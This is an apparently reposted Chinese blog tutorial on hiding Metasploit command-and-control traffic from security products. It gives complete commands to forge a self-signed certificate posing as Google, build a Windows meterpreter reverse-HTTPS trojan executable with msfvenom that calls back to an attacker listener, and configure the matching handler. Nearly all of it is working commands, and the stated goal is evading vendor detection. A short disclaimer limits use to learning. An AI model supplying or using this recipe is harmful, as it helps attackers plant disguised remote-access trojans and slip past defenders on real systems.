msf流量通讯特征修改
作者:互联网
众所周知msf在安全界的地位,那么它的特征安全厂商肯定是抓的死死的,所以我们需要相应的修改一下。
使用openssl生成证书。
对于openssl这个软件,kali自带。
输入如下命令;
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=US/ST=London/L=London/O=Google Trust Services LLC/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
CN=(名字与姓氏), OU=(组织单位名称), O=(组织名称), L=(城市或区域名称), ST=(州或省份名称), C=(单位的两字母国家代码
参数详解;
-new 指生成证书请求
-nodes 表示私钥不加密,若不带参数将提示输入密码;
-x509表示输出证书;
-days365 为有效期;
-x509 表示直接输出证书;
-subj选项执行自动输入;
以上便生成了一个伪谷歌证书了,让msf用上该证书。
首先生成配置该证书的木马文件。
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.1.131 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o p.exe
将该木马上传到虚拟机上抓包
进入msfconsole,进行如下配置:
use exploit/multi/handler
set payload windows/meterpreter/reverse_winhttps
set lhost 0.0.0.0
set lport 443
set HandlerSSLCert www.google.com.pem
set StagerVerifySSLCert true
run
执行并抓包:
经过加密的数据包,并且自定义证书。
声明:本文所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!!!
标签:www,通讯,set,crt,证书,流量,google,msf,com 来源: https://blog.csdn.net/qq_52839196/article/details/122810834